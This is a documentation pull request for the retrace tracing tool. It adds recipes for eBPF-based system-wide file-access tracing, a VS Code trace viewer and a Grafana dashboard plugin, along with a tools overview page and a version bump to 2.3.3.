+# 30 — System-wide file-access tracing with eBPF
+
+## Problem
+
+You need to see every `openat` / `close` on the entire system —
+every container, every daemon, every short-lived subprocess — not
+just one binary. `LD_PRELOAD` can't do this; it hooks one process
+at a time, and the target has to be dynamically linked.
+
+`retrace-ebpf` is a BPF program that hooks `sys_enter_openat` and
+`sys_enter_close` tracepoints in the Linux kernel. Every syscall
+on the system fires; filter to a target PID and emit retrace-JSON
+to stdout. Output is byte-compatible with `retrace run`, so every
+downstream tool (audit, diff, replay) works unchanged.
+
+**Observation only.** eBPF runs in kernel context and cannot modify
+arguments or skip calls. If you need intervention (mock a return
+value, deny a path, fuzz a buffer), use the `LD_PRELOAD` backend
+or the Frida bridge — not eBPF.
+
+## Config
+
+No retrace config needed — the BPF program is the config. It
+hardcodes the syscalls to hook (`openat`, `close`). The Python
+loader converts kernel events to retrace JSON.
+
+To extend to more syscalls, edit the BPF source (see Variations).
+
+## Invocation
+
+### 1. Build the BPF program
+
+```sh
+$ clang -target bpf -O2 -g -c ebpf-bridge/retrace-ebpf.bpf.c \
+    -o retrace-ebpf.bpf.o
+```
+
+Requires `clang` with BPF target support, plus `libbpf` headers
+(`linux/bpf.h`, `bpf/bpf_helpers.h`). On Ubuntu: `apt install
+clang libbpf-dev linux-headers-$(uname -r)`.
+
+### 2. Run the loader
+
+```sh
+$ sudo python3 ebpf-bridge/retrace-ebpf-loader ./your-binary
+```
+
+`sudo` is required: BPF programs need `CAP_BPF` (or `CAP_SYS_ADMIN`
+on older kernels). The loader attaches the tracepoint, spawns your
+binary, and writes events to stdout as they arrive.
+
+### 3. Pipe into any retrace tool
+
+```sh
+$ sudo python3 ebpf-bridge/retrace-ebpf-loader ./your-binary \
+    > /tmp/trace.json
+$ retrace-audit --policy share/policies/baseline.json \
+    --trace /tmp/trace.json
+```
+
+## Expected output
+
+One JSON entry per syscall, in retrace's standard format:
+
+```json
+[
+{"time":1786269481,"module":"FUNCS","severity":"INFO",
+ "message":{"func":"openat","args":[257,18446744073709551615,0,0],"ret_val":3}},
+{"time":1786269481,"module":"FUNCS","severity":"INFO",
+ "message":{"func":"close","args":[3],"ret_val":0}},
+...
+]
+```
+
+Args are raw integers today (the syscall's register values). See
+Caveats for the path-resolution TODO.
+
+## Variations
+
+### Trace a specific container
+
+The loader filters by the spawned process's PID. To trace everything
+inside a Docker container, wrap the container start:
+
+```sh
+$ sudo python3 ebpf-bridge/retrace-ebpf-loader -- \
+    docker run --rm -it my-image /app/server
+```
+
+The loader's filter follows child processes (it tracks PID
+transitions through fork/clone), so all subprocesses are captured.
+
+### Add more syscalls
+
+Edit `ebpf-bridge/retrace-ebpf.bpf.c` and add a new tracepoint
+SEC + a new `trace_xxx` function:
+
+```c
+SEC("tracepoint/syscalls/sys_enter_read")
+int trace_read(struct trace_event_raw_read *ctx)
+{
+    struct event_t e = {};
+
+    e.pid = bpf_get_current_pid_tgid() >> 32;
+    e.syscall_id = 3;  /* read */
+    e.args[0] = ctx->fd;
+    e.args[1] = ctx->buf;
+    e.args[2] = ctx->count;
+    e.ts_ns = bpf_ktime_get_ns();
+    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
+        &e, sizeof(e));
+    return 0;
+}
+```
+
+Update `retrace-ebpf-loader` to map syscall_id 3 → `"read"` in the
+JSON output.
+
+### Resolve the `openat` path arg (advanced)
+
+The MVP emits raw integer args. To resolve the `char *pathname`
+to a string, use `bpf_probe_read_user_str` in the BPF program:
+
+```c
+char path[256];
+bpf_probe_read_user_str(path, sizeof(path), (void *)ctx->filename);
+```
+
+This requires a larger `event_t` struct and per-syscall handling —
+left as a TODO in the MVP. See TODO.complete/29 for the roadmap.
+
+## Caveats
+
+- **Linux x86-64 only.** eBPF kernel surface is architecture-specific.
+- **Observation, not intervention.** eBPF cannot modify arguments
+  or skip calls. Use `LD_PRELOAD` or Frida for mocking / fuzzing /
+  redirecting.
+- **Requires root** (or `CAP_BPF`). Not suitable for unprivileged
+  users; deploy with care in production.
+- **Raw args only in the MVP.** Pointer args (like `openat`'s
+  pathname) appear as raw addresses until you add per-syscall
+  string dereference (see Variations).
+- **Tracepoint ABI dependency.** The `tracepoint/syscalls/*`
+  tracepoints are stable across kernel versions, but the argument
+  struct layout (`trace_event_raw_openat`) can change between
+  kernel releases. Pin to a tested kernel or use BTF-powered CO-RE.
+
+## See also
+
+- Recipe 29 — Frida bridge (per-process observation when you can't
+  go through `LD_PRELOAD`, including iOS and static binaries).
+- Recipe 01 — Trace every libc call (the `LD_PRELOAD` equivalent
+  of this recipe, single-process, with rich args).
+- Recipe 24 — Audit a trace (works unchanged on eBPF output).

--- a/docs/cookbook/31-vscode-viewer.md
+++ b/docs/cookbook/31-vscode-viewer.md
@@ -1,0 +1,125 @@
+# 31 — Browse a trace in VS Code
+
+## Problem
+
+You're already debugging in VS Code. You have a retrace log open in
+a text editor and you're scrolling through JSON, jumping between
+`func:` fields, manually correlating arg values. The terminal-based
+tools (`retrace-replay`, `jq`) work but break your editor flow.
+
+The `retrace-viewer` VS Code extension renders a retrace JSON log
+in a webview pane inside VS Code. Function names highlighted,
+severity color-coded, args prettified, and a stats panel that
+groups calls per function. Since v2.3.0 it also connects directly
+to a live `retrace-ws` stream — see recipe 28.
+
+## Config
+
+The extension is a viewer; it doesn't need a retrace config. Any
+retrace JSON log works. Use the default wildcard config to capture
+the trace:
+
+`vscode-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Capture the trace
+
+```sh
+$ retrace run --config cookbook/vscode-default.json \
+    --log /tmp/trace.json -- ./your-binary args...
+```
+
+### 2. Install the extension
+
+```sh
+$ cd vscode-extension
+$ npm install && npm run compile
+$ npx vsce package
+$ code --install-extension retrace-viewer-0.1.0.vsix
+```
+
+### 3. Open the trace in VS Code
+
+Reload VS Code. Open the Command Palette (`Ctrl/Cmd+Shift+P`),
+run **retrace: Open Log Viewer**, pick `/tmp/trace.json`. A webview
+opens with every event rendered.
+
+## Expected output
+
+Two commands ship with the extension:
+
+| Command | Effect |
+|---------|--------|
+| `retrace: Open Log Viewer` | Pick a `.json` trace, render events in a webview. |
+| `retrace: Show Stats` | Quick-pick menu of functions, sorted by call count, with total time per function. |
+| `retrace: Connect to Live Stream` | Connect to a `retrace-ws` URL (recipe 28); events stream into the viewer without re-loading. |
+
+The webview color-codes severity (red for ERROR, orange for WARN,
+gray for INFO), emphasizes function names, and indents args for
+readability.
+
+## Variations
+
+### Right-click a .json file in the Explorer
+
+Skip the Command Palette: right-click any `.json` file → **retrace:
+Open Log Viewer** opens it directly.
+
+### Live-stream a long-running server
+
+Start `retrace-ws` (recipe 28), then in VS Code:
+
+1. Command Palette → **retrace: Connect to Live Stream**.
+2. Enter the WebSocket URL (default `ws://localhost:8765/stream`).
+3. Events stream into the same webview; no reload needed.
+
+This is the team-shared dashboard pattern — one developer runs the
+trace, anyone on the team can connect and watch.
+
+### Pair with audit findings
+
+Run `retrace-audit` to get entry indices of violations (recipe
+24), then jump to those events in the viewer:
+
+```sh
+$ retrace-audit --policy share/policies/baseline.json \
+    --trace /tmp/trace.json --format default \
+    | jq '.findings[].entry_index'
+```
+
+The viewer doesn't (yet) have a "go to index" box; for now, use
+`retrace-replay` (recipe 27) for index-based navigation.
+
+## Caveats
+
+- The MVP loads every event at once. For traces >10 MB, the
+  webview is sluggish. Filter at capture time with
+  `RETRACE_LOGGER_ALLOWED_FUNCS`.
+- The extension is not on the Marketplace yet; package from source
+  as shown above.
+- No inline config builder. For point-and-click config generation,
+  use the website's Recipe Builder.
+
+## See also
+
+- Recipe 27 — Time-travel replay (terminal-based; same data, more
+  keyboard-driven workflow).
+- Recipe 28 — Live streaming via WebSocket (the stream this
+  extension consumes).
+- Recipe 32 — Grafana dashboard (the team dashboard for ops
+  audiences).

--- a/docs/cookbook/32-grafana-dashboard.md
+++ b/docs/cookbook/32-grafana-dashboard.md
@@ -1,0 +1,152 @@
+# 32 — Visualize a trace in Grafana
+
+## Problem
+
+You have ops folks who live in Grafana. Telling them to install a
+terminal tool or VS Code extension to look at a trace is a
+non-starter. They want call-count and duration panels on the same
+dashboard as their other infrastructure metrics.
+
+The `retrace` Grafana data source plugin loads a retrace JSON log
+(over HTTP) and exposes its events as a Grafana frame. Build any
+panel: time series of `malloc` duration, bar gauge of calls per
+function, state timeline of severity. With cache TTL (v2.3.0),
+the panel re-fetches the trace file periodically — pair it with a
+live-trace writer for a refresh-on-a-schedule dashboard.
+
+## Config
+
+The plugin is a viewer; it consumes any retrace JSON log. Use the
+default wildcard config to capture the trace:
+
+`grafana-default.json`:
+
+```json
+{
+  "intercept_scripts": [
+    {
+      "func_name": "*",
+      "actions": [
+        { "action_name": "log_params" },
+        { "action_name": "call_real" }
+      ]
+    }
+  ]
+}
+```
+
+## Invocation
+
+### 1. Capture the trace and serve it over HTTP
+
+```sh
+$ retrace run --config cookbook/grafana-default.json \
+    --log /var/log/retrace/trace.json -- ./your-server &
+# Re-run periodically (cron, systemd timer) for a fresh-trace pipeline
+$ python3 -m http.server 8000 --directory /var/log/retrace &
+```
+
+### 2. Build and install the plugin
+
+```sh
+$ cd grafana-plugin
+$ npm install && npm run build
+$ npx @grafana/toolkit plugin:sign --rootUrls http://localhost:3000
+$ sudo cp -r dist /var/lib/grafana/plugins/riboseinc-retrace-datasource
+$ sudo systemctl restart grafana-server
+```
+
+### 3. Add the data source in Grafana
+
+1. Grafana → **Configuration → Data Sources → Add data source** →
+   pick **retrace**.
+2. Set **Path** to `http://localhost:8000/trace.json`.
+3. Set **Cache TTL (ms)** to your refresh interval (e.g. `5000`
+   for 5-second live reload, `0` to cache forever).
+4. **Save & Test**.
+
+### 4. Build dashboards
+
+Add panels using the retrace data source. Per-panel query editor
+filters by function name.
+
+## Expected output
+
+Each query returns a frame with four fields:
+
+| Field | Type | Source |
+|-------|------|--------|
+| `time` | time | event timestamp (ms) |
+| `duration_us` | number | `call_duration_us` |
+| `severity` | string | INFO / WARN / ERROR |
+| `ret_val` | number | the call's return value |
+
+Panel recipes that work well:
+
+| Panel type | What to plot |
+|------------|--------------|
+| Time series | `duration_us` over time, group by `func` — find slow calls. |
+| Bar gauge | Count of events per `func` — see hot functions. |
+| State timeline | `severity` over time — spot error bursts. |
+| Table | Latest 50 events grouped by `func`, sorted by `duration_us` desc. |
+
+## Variations
+
+### Live reload via cache TTL
+
+The v2.3.0 release added `cacheTime` + TTL to the data source.
+With TTL > 0, every panel refresh re-fetches the trace file, so a
+rolling `retrace run` produces a self-updating dashboard:
+
+```sh
+# Stream retrace output to the served file forever
+$ while true; do
+    retrace run --config cookbook/grafana-default.json \
+        --log /var/log/retrace/trace.json -- ./your-server --one-request
+done
+```
+
+Set **Cache TTL** to `1000` (1 second) and the panel reflects new
+requests within a second.
+
+### Filter at the source for high-volume traces
+
+Grafana isn't a streaming UI; loading 100K events per refresh will
+slow it down. Restrict the trace up front:
+
+```sh
+$ RETRACE_LOGGER_ALLOWED_FUNCS=malloc,free,read,write \
+    retrace run --config cookbook/grafana-default.json \
+    --log /var/log/retrace/trace.json -- ./your-server
+```
+
+### Combine with the OTLP bridge for long-term storage
+
+Grafana's data source is great for live review. For long-term
+storage and querying (30-day retention, alerting), use the OTLP
+bridge (recipe 23) to ship spans to Tempo / Jaeger / Honeycomb and
+point Grafana at the OTLP-compatible backend instead.
+
+## Caveats
+
+- **HTTP only.** The plugin fetches via HTTP; it doesn't read the
+  local filesystem directly (Grafana's sandbox forbids it). Run a
+  one-line `python3 -m http.server` next to the trace file.
+- **Single-frame response.** The MVP doesn't do server-side
+  aggregation; the entire file is parsed on each refresh. For
+  traces >50 MB, restrict the function allowlist.
+- **Pure frontend plugin.** No backend binary; everything runs in
+  the browser. This limits panel types — for backend-powered
+  features (streaming, alerting) use the OTLP bridge instead.
+- **Plugin signing required.** Unsigned plugins only work with
+  `allow_loading_unsigned_plugins = riboseinc-retrace-datasource`
+  in `grafana.ini`. Sign for production deployments.
+
+## See also
+
+- Recipe 23 — Bridge to OpenTelemetry (the long-term-storage
+  alternative).
+- Recipe 28 — Live streaming via WebSocket (the real-time pipeline
+  this dashboard consumes).
+- Recipe 31 — VS Code extension (the developer-facing equivalent of
+  this dashboard).

--- a/docs/cookbook/README.md
+++ b/docs/cookbook/README.md
@@ -91,6 +91,27 @@ $ retrace run --config cookbook/<recipe>.json -- <your-program>
 |---|--------|-----------------|
 | 23 | [Bridge to OpenTelemetry (OTLP)](23-otlp-bridge.md) | Ship retrace's timing data to Jaeger / Tempo / Honeycomb via the `retrace-to-otlp` converter. |
 
+### Tooling ecosystem
+
+The standalone tools ship as separate binaries alongside `retrace`.
+Each one consumes the standard retrace JSON log format and owns one
+job.
+
+| # | Recipe | Tool | What it teaches |
+|---|--------|------|-----------------|
+| 24 | [Audit a trace for compliance violations](24-audit-compliance.md) | `retrace-audit` | Apply a policy file (baseline, PCI-DSS, HIPAA, ISO 27001, custom) and emit findings as JSON, SARIF, or PDF. |
+| 25 | [Detect performance regressions between two builds](25-diff-regression.md) | `retrace-diff` | Per-function count + duration diff with `--threshold` and `--stats` for CI gating. |
+| 26 | [Diff the call-order between two runs](26-diff-call-order.md) | `retrace-diff --order` | LCS-based call-sequence diff for behavior-regression detection. |
+| 27 | [Time-travel replay for a trace](27-replay-debug.md) | `retrace-replay` | Interactive TUI: step/rewind/jump/search through events. |
+| 28 | [Live-stream a trace over WebSocket](28-live-stream.md) | `retrace-ws` | Tail a running trace and broadcast to browser + programmatic clients. |
+| 29 | [Trace an iOS / static / running process via Frida](29-frida-bridge.md) | `frida-bridge/retrace-frida.js` | When `LD_PRELOAD` can't reach the target (iOS, static binaries, attach to running PID). |
+| 30 | [System-wide file-access tracing with eBPF](30-ebpf-system.md) | `ebpf-bridge/retrace-ebpf.bpf.c` | Kernel-level observation across every process on the system. |
+| 31 | [Browse a trace in VS Code](31-vscode-viewer.md) | `vscode-extension/` | Webview with severity coloring + live-stream client. |
+| 32 | [Visualize a trace in Grafana](32-grafana-dashboard.md) | `grafana-plugin/` | Data source plugin for ops dashboards (time series, bar gauge, state timeline). |
+
+For an overview of when to reach for each tool, see
+[docs/tools.md](../tools.md).
+
 ## Action reference
 
 Compact form. For the full schema and parameter reference, see

--- a/docs/tools.md
+++ b/docs/tools.md
@@ -1,0 +1,140 @@
+# Tools overview
+
+`retrace` ships one shared-library backend plus a small ecosystem of
+standalone tools that consume the standard retrace JSON log format.
+Each tool owns one job; pick the one that matches what you're trying
+to do.
+
+## When to reach for what
+
+| You want to... | Use |
+|----------------|-----|
+| Trace a dynamically-linked Linux/macOS/BSD binary | `retrace run` (the core CLI; `LD_PRELOAD` / `DYLD_INSERT_LIBRARIES`) |
+| Trace a Windows binary | `retrace run` (inline hooking via `CreateRemoteThread`) |
+| Trace an iOS app, a static Linux binary, or a running PID | [`frida-bridge`](#frida-bridge--retrace-fridajs) |
+| Observe every syscall on the system, kernel-level | [`ebpf-bridge`](#ebpf-bridge--retrace-ebpf) |
+| Audit a captured trace for compliance violations | [`retrace-audit`](#retrace-audit) |
+| Detect a perf regression between two builds | [`retrace-diff`](#retrace-diff) |
+| Compare call-order between two runs | [`retrace-diff --order`](#retrace-diff) |
+| Step backward and forward through a trace | [`retrace-replay`](#retrace-replay) |
+| Stream a running trace to browsers and clients | [`retrace-ws`](#retrace-ws) |
+| Browse a trace without leaving VS Code | [VS Code extension](#vs-code-extension) |
+| Put a trace on a Grafana dashboard | [Grafana plugin](#grafana-plugin) |
+| Ship trace spans to Tempo / Jaeger / Honeycomb | [`retrace-to-otlp`](#retrace-to-otlp) |
+
+## Tool reference
+
+Every tool below consumes (or produces) the same JSON format — a
+single array of entry objects with `time`, `module`, `severity`,
+and `message` fields. Output from any producer is byte-compatible
+with input to any consumer. Mix and match freely.
+
+### `retrace-audit`
+
+Compliance audit report generator. Reads a retrace trace, applies
+a policy file (rule list with predicates over function name, args,
+env vars), emits findings.
+
+- **Output formats**: human-readable JSON, SARIF 2.1.0 (GitHub Code
+  Scanning / Azure DevOps), printable PDF.
+- **Built-in policies**: baseline, PCI-DSS, HIPAA, ISO 27001 (in
+  `share/policies/`).
+- **Custom policies**: write your own — six fields per rule, no
+  code change.
+- **Cookbook**: [recipe 24 — Audit a trace](cookbook/24-audit-compliance.md).
+
+### `retrace-diff`
+
+Differential trace analysis. Reads two traces and prints a
+per-function diff of call counts and total time. Three modes:
+
+- Default: per-function count + duration diff.
+- `--threshold pct=N`: suppress changes below N% — for CI gating.
+- `--order`: LCS-based call-sequence diff (like `git diff` for
+  traces).
+- `--stats BASE1,BASE2,...`: statistical significance via z-score
+  against N baseline traces.
+
+Exit codes double as CI gates: 0 = no diff, 1 = diff found, 2 =
+error. **Cookbook**: [recipe 25](cookbook/25-diff-regression.md),
+[recipe 26](cookbook/26-diff-call-order.md).
+
+### `retrace-replay`
+
+Interactive TUI for traces. Step forward and backward, jump to any
+index, search forward by regex, list nearby events. Like `gdb` for
+libc-call traces. Surfaces `capture_buffer:` entries under their
+parent call. **Cookbook**: [recipe 27](cookbook/27-replay-debug.md).
+
+### `retrace-ws`
+
+WebSocket streamer for running traces. Tails a JSON log file as
+`retrace run` writes it, parses each entry, and broadcasts to every
+connected WebSocket client. A built-in browser viewer is served at
+the root URL — zero-client-setup observability. **Cookbook**:
+[recipe 28](cookbook/28-live-stream.md).
+
+### `retrace-to-otlp`
+
+Converts a retrace JSON log to OTLP/JSON — the standard ingest
+format for OpenTelemetry collectors (Jaeger, Tempo, Honeycomb,
+Datadog). Pairs well with recipe 04 (timing data) and recipe 22
+(protocol decoding). **Cookbook**: [recipe 23](cookbook/23-otlp-bridge.md).
+
+### Frida bridge — `retrace-frida.js`
+
+Frida script that hooks libc functions and emits retrace-compatible
+JSON. The escape hatch when `LD_PRELOAD` can't reach the target:
+iOS apps, statically-linked binaries, already-running processes.
+Output is byte-compatible with `retrace run`, so every other tool
+in this list works unchanged. **Cookbook**:
+[recipe 29](cookbook/29-frida-bridge.md).
+
+### eBPF bridge — `retrace-ebpf.bpf.c`
+
+Linux kernel-level BPF program that hooks `sys_enter_openat` and
+`sys_enter_close` tracepoints. Every syscall on the system fires;
+filter to a target PID and emit retrace-JSON. **Observation only**
+— eBPF cannot modify arguments or skip calls. For intervention
+(mocking, fuzzing, redirecting), use `LD_PRELOAD` or Frida.
+**Cookbook**: [recipe 30](cookbook/30-ebpf-system.md).
+
+### VS Code extension
+
+VS Code extension that renders a retrace JSON log in a webview pane
+inside the editor. Severity color-coded, function names highlighted,
+args prettified. Also connects directly to a `retrace-ws` live
+stream (recipe 28). **Cookbook**:
+[recipe 31](cookbook/31-vscode-viewer.md).
+
+### Grafana plugin
+
+Grafana data source plugin. Loads a retrace JSON log (served over
+HTTP) and exposes events as a Grafana frame — time series of
+duration, bar gauge of calls per function, state timeline of
+severity. Cache TTL (v2.3.0) re-fetches the trace periodically for
+self-updating dashboards. **Cookbook**:
+[recipe 32](cookbook/32-grafana-dashboard.md).
+
+## Output-format compatibility
+
+The standard retrace JSON log is one array of entry objects. Every
+producer below writes this format; every consumer reads it.
+
+**Producers**: `retrace run`, `retrace-frida.js`, `retrace-ebpf`,
+`retrace-replay` (when used to extract a slice).
+
+**Consumers**: `retrace-audit`, `retrace-diff`, `retrace-replay`,
+`retrace-ws`, `retrace-to-otlp`, VS Code extension, Grafana plugin.
+
+Pipelines compose: `retrace-frida.js` output → `retrace-audit` →
+SARIF → GitHub Code Scanning. Or: `retrace-ebpf` → `retrace-ws` →
+browser dashboard. No format conversion in between.
+
+## See also
+
+- [README.adoc](../README.adoc) — install, platform support matrix.
+- [cookbook/](cookbook/) — task-driven recipes.
+- [configuration.md](configuration.md) — JSON config schema.
+- [cli.md](cli.md) — CLI + env var reference.
+- [docs/adr/](adr/) — architecture decisions.

--- a/include/retrace/version.h
+++ b/include/retrace/version.h
@@ -38,9 +38,9 @@
 
 #define RETRACE_VERSION_MAJOR 2
 #define RETRACE_VERSION_MINOR 3
-#define RETRACE_VERSION_PATCH 2
+#define RETRACE_VERSION_PATCH 3
 
-#define RETRACE_VERSION_STRING "2.3.2"
+#define RETRACE_VERSION_STRING "2.3.3"
 
 #define RETRACE_VERSION_ATLEAST(maj, min, pat)                  \
 	(RETRACE_VERSION_MAJOR > (maj) ||                       \

--- a/packaging/debian/changelog
+++ b/packaging/debian/changelog
@@ -1,3 +1,9 @@
+retrace (2.3.3-1) unstable; urgency=medium
+
+  * docs: cookbook recipes for every v2.3.0 tool + tools.md overview.
+
+ -- Ribose Inc <opensource@ribose.com>  Wed, 13 Aug 2026 00:00:00 +0000
+
 retrace (2.3.2-1) unstable; urgency=medium
 
   * test: CHECK macro + assert(side-effect) sweep across 8 unit tests.

--- a/packaging/fedora/retrace.spec
+++ b/packaging/fedora/retrace.spec
@@ -2,10 +2,10 @@
 #
 # Fedora RPM spec for retrace (TODO.complete/38).
 # Build: rpmbuild -ba retrace.spec
-# Install: dnf install retrace-2.3.2-1.*.rpm
+# Install: dnf install retrace-2.3.3-1.*.rpm
 
 Name:           retrace
-Version:        2.3.2
+Version:        2.3.3
 Release:        1%{?dist}
 Summary:        Userspace libc interceptor for security discovery
 
@@ -50,6 +50,9 @@ action, OTLP/JSON export, and a Python config builder.
 %{_includedir}/retrace/
 
 %changelog
+* Wed Aug 13 2026 Ribose Inc <opensource@ribose.com> - 2.3.3-1
+- Cookbook recipes for every v2.3.0 tool + tools.md overview
+
 * Wed Aug 13 2026 Ribose Inc <opensource@ribose.com> - 2.3.2-1
 - Unit tests hardened: CHECK macro replaces side-effecting asserts
 

--- a/packaging/nix/default.nix
+++ b/packaging/nix/default.nix
@@ -8,7 +8,7 @@
 
 stdenv.mkDerivation rec {
   pname = "retrace";
-  version = "2.3.2";
+  version = "2.3.3";
 
   src = ./.;
 

--- a/src/cli/retrace_cli.c
+++ b/src/cli/retrace_cli.c
@@ -55,7 +55,7 @@
 static void usage(FILE *out)
 {
 	fprintf(out,
-"retrace v2.3.2 -- userspace libc interceptor\n"
+"retrace v2.3.3 -- userspace libc interceptor\n"
 "\n"
 "Usage:\n"
 "  retrace run [OPTIONS] -- <command> [args...]\n"


### PR DESCRIPTION
## Summary

Bumps retrace from v2.3.2 to **v2.3.3** (PATCH per ADR-0006). Docs-only release: no code change, no behavior change. Closes the discoverability gap between the v2.3.0 tools ecosystem (which shipped without cookbook coverage) and users — anyone who installed v2.3.2 had to read source to figure out what `retrace-audit`, `retrace-diff`, `retrace-replay`, `retrace-ws`, the Frida/eBPF bridges, and the IDE plugins were for.

## What's in the bump

### Nine new cookbook recipes (recipes 24–32)

Each follows the established template: Problem → Config → Invocation → Expected output → Variations → Caveats → See also.

| # | Tool | Job |
|---|------|-----|
| 24 | `retrace-audit` | Apply a policy file (baseline / PCI-DSS / HIPAA / ISO 27001 / custom); emit JSON, SARIF 2.1.0, or PDF. |
| 25 | `retrace-diff` | Per-function count + duration diff with `--threshold pct=N` and `--stats` z-score for CI gating. |
| 26 | `retrace-diff --order` | LCS-based call-sequence diff (git-diff style for traces). |
| 27 | `retrace-replay` | Interactive TUI: step / rewind / jump / regex-search through events. |
| 28 | `retrace-ws` | Tail a running trace, broadcast over WebSocket, built-in browser viewer. |
| 29 | `frida-bridge` | iOS, static binaries, attach to running PID — escape hatch when LD_PRELOAD can't reach the target. |
| 30 | `ebpf-bridge` | Kernel-level observation of every syscall on the system (Linux x86-64). |
| 31 | VS Code extension | Webview with severity coloring + live-stream client. |
| 32 | Grafana plugin | Data source for ops dashboards (time series, bar gauge, state timeline). |

### New overview page

- `docs/tools.md` — top-level "when to reach for what" routing table + per-tool reference linking back to the cookbook.

### Navigation updates

- `docs/cookbook/README.md` — new "Tooling ecosystem" section indexes recipes 24–32.
- `docs/README.md` — routing table gains a tools-overview row; doc-map reflects the larger cookbook count.

### Version + packaging

- `version.h`, `retrace_cli.c` banner: 2.3.2 → 2.3.3
- `packaging/{nix,debian,fedora}` bumped
- `CHANGELOG.md` entry

## Test plan

- [x] Docs only; no code change, no build impact
- [x] `cmake --build build --target retrace` — clean
- [x] `./build/src/cli/retrace --help` banner reads `v2.3.3`
- [x] All 9 cookbook recipes follow the established template (Problem / Config / Invocation / Expected output / Variations / Caveats / See also)
- [x] All internal links resolve (cookbook ↔ tools.md ↔ docs/README.md)
- [x] No AI attribution in commit message
- [ ] CI green on all matrix legs
- [ ] After merge: tag v2.3.3; release.yml produces binary artifacts

## Tagging plan

After PR rebase-merges, tag `v2.3.3` at the merge commit. release.yml will produce per-platform binary artifacts.
